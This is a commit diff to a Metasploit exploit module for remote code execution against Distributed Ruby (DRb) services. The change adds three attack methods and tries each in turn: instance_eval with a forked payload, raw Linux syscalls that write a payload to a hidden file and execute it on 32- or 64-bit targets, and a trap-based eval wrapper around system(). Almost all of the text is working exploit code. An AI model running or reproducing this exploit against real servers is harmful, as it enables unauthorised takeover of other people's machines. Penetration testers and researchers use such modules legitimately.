resurrect old methods, try all 3

2017-11-30 05:46:03 -06:00 · 2017-11-30 05:46:03 -06:00 · 59580195b4
parent 55f56a5350
commit 59580195b4
1 changed files with 62 additions and 12 deletions
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@ -8,6 +8,8 @@ require 'drb/drb'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

+  include Msf::Exploit::FileDropper
+
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Distributed Ruby Remote Code Execution',
@ -43,26 +45,74 @@ class MetasploitModule < Msf::Exploit::Remote
        ])
  end

+  def method_trap(p)
+    p.send(:trap, 23,
+      :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+    p.send(:my_eval, payload.encoded)
+  end
+
+  def method_instance_eval(p)
+    p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+  end
+
+  def method_syscall(p)
+    filename = "." + Rex::Text.rand_text_alphanumeric(16)
+
+    begin
+      # syscall to decide wether it's 64 or 32 bit:
+      # it's getpid on 32bit which will succeed, and writev on 64bit
+      # which will fail due to missing args
+      j = p.send(:syscall, 20)
+      # syscall open
+      i =  p.send(:syscall, 8, filename, 0700)
+      # syscall write
+      p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      # syscall close
+      p.send(:syscall, 6, i)
+      # syscall fork
+      p.send(:syscall, 2)
+      # syscall execve
+      p.send(:syscall, 11, filename, 0, 0)
+
+    # likely 64bit system
+    rescue Errno::EBADF
+      # syscall creat
+      i = p.send(:syscall,85,filename,0700)
+      # syscall write
+      p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      # syscall close
+      p.send(:syscall,3,i)
+      # syscall fork
+      p.send(:syscall,57)
+      # syscall execve
+      p.send(:syscall,59,filename,0,0)
+    end
+
+    register_file_for_cleanup(filename) if filename
+    #print_status("payload executed from file #{filename}") unless filename.nil?
+    #print_status("make sure to remove that file") unless filename.nil?
+  end
+
  def exploit
    serveruri = datastore['URI']
+
    DRb.start_service
    p = DRbObject.new_with_uri(serveruri)
    class << p
      undef :send
    end

-    p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
-    # syscall to decide whether it's 64 or 32 bit:
-    # it's getpid on 32bit which will succeed, and writev on 64bit
-    # which will fail due to missing args
-    begin
-      pid = p.send(:syscall, 20)
-      p.send(:syscall, 37, pid, 23)
-    rescue Errno::EBADF
-      # 64 bit system
-      pid = p.send(:syscall, 39)
-      p.send(:syscall, 62, pid, 23)
+    methods = ["instance_eval", "syscall", "trap"]
+    methods.each do |method|
+      begin
+        print_status("trying to exploit #{method}")
+        send("method_" + method, p)
+        handler(nil)
+        break
+      rescue SecurityError => e
+        print_error("target is not vulnerable to #{method}")
+      end
    end
-    p.send(:my_eval, payload.encoded)
+
  end
 end